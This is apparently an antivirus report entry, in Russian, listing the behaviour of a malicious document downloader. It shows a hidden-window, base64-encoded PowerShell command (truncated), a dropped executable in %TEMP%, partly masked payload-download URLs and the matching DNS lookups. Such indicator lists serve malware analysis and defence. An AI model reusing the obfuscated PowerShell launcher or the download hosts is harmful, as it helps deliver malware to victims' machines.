Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AbwBfAG0ANQBrAD0AKAAoACcAQwB2AGIAJwArACcAZQAnACkAKwAoACcAeQAnACsAJwBiAGwAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AFQARQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\lki6mun.exe
- %TEMP%\word\2019\lki6mun.exe
- %TEMP%\word\2019\lki6mun.exe
- http://dr######emyrtlebeach.com/wp-content/cache/2Rw/
- http://ne#.#ittyg.com/cgi-bin/L7v/
- http://ne#.#ittyg.com/cgi-sys/suspendedpage.cgi
- http://om###help.net/tom/d/
- http://pr####tinternet.com/12_(+/LF/
- http://pr####tinternet.com/cgi-sys/suspendedpage.cgi
- http://di#####cbuikhien.com/DocumentRoot/P/
- DNS ASK dr######emyrtlebeach.com
- DNS ASK ne#.#ittyg.com
- DNS ASK om###help.net
- DNS ASK pr####tinternet.com
- DNS ASK me###huzhai.com
- DNS ASK di#####cbuikhien.com
- DNS ASK na####roject.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG8AbwBfAG0ANQBrAD0AKAAoACcAQwB2AGIAJwArACcAZQAnACkAKwAoACcAeQAnACsAJwBiAGwAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AFQARQBtAHAAXABXAE8AUgBEAFwAMgAwAD...' (со скрытым окном)